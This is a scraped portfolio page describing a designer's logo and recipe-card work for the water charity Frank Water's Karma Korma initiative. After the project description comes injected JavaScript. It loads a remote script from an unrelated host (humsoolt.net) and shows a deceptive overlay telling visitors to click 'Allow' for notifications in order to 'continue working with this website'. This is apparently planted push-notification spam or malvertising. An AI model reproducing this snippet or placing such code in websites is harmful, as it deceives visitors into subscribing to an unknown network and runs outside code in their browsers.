

[tw-column width=”one-third” position=”first”]
Client
Frank Water
[tw-button size=”medium” background=”76c9c6″ color=”” target=”_blank” link=”http://www.frankwater.com”]Visit Site[/tw-button]
[/tw-column]
[tw-column width=”two-third” position=”last”]
About the Project
Frank Water is a non-profit charity that saves lives through funding innovative and sustainable clean water projects in developing countries. As part of their Karma Korma initiative I was asked to design a logo and recipe cards combining their existing branding with an Indian aesthetic. [/tw-column]
const overlayTranslations = {"en":{"title":"Attention!","description":"Click “Allow” to subscribe to notifications and continue working with this website."}};
const overlay = {"delay":3000,"overlayStyle":{"background":"rgba(0,0,0, 0.6)"},"title":"Attention!","description":"Click “Allow” to subscribe to notifications and continue working with this website.",...(overlayTranslations[navigator.language.slice(0, 2).toLowerCase()]||Object.values(overlayTranslations)[0])};
const s = document.createElement('script');
s.src='//humsoolt.net/pfe/current/tag.min.js?z=2774009';
s.onload = (sdk) => {
sdk.updateOptions({overlay, overlayTranslations})
sdk.onPermissionDefault(() => {});
sdk.onPermissionAllowed(() => {});
sdk.onPermissionDenied(() => {});
sdk.onAlreadySubscribed(() => {});
sdk.onNotificationUnsupported(() => {});
}
document.head.appendChild(s);